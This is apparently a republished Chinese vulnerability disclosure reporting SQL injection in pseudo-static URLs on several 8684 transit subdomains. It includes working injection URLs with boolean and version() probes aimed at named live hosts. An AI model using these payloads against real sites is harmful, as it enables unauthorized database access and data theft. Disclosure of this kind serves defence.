简要描述:
8684公交SQL注入(涉及多个站点)!
详细说明:
伪静态注入,直接上图证明:
http://hkdt.8684.cn/z_-1%22%20or%20%2262%22%3d%2262
简单变换下条件,请求后跳转到了首页:
http://hkdt.8684.cn/z_-1%22%20or%20%2262%22%3d%22621
如果要进一步获取数据,恐怕还得写个中转的脚本...(暂不继续!)
存在同样问题的还有其它多个站点:
http://bjdt.8684.cn/
http://szdt.8684.cn/
http://gzdt.8684.cn/
...
漏洞证明:
同上!
http://hkdt.8684.cn/z_-1%22%20or%20version%28%29%3E4%20and%20%221%22=%221
http://hkdt.8684.cn/z_-1%22%20or%20version%28%29%3E5%20and%20%221%22=%221
用以上两句判断出数据库版本,
8684公交SQL注入(涉及多个站点) 伪静态注射技巧脚本安全
,电脑资料
《8684公交SQL注入(涉及多个站点) 伪静态注射技巧脚本安全》(https://www.unjs.com)。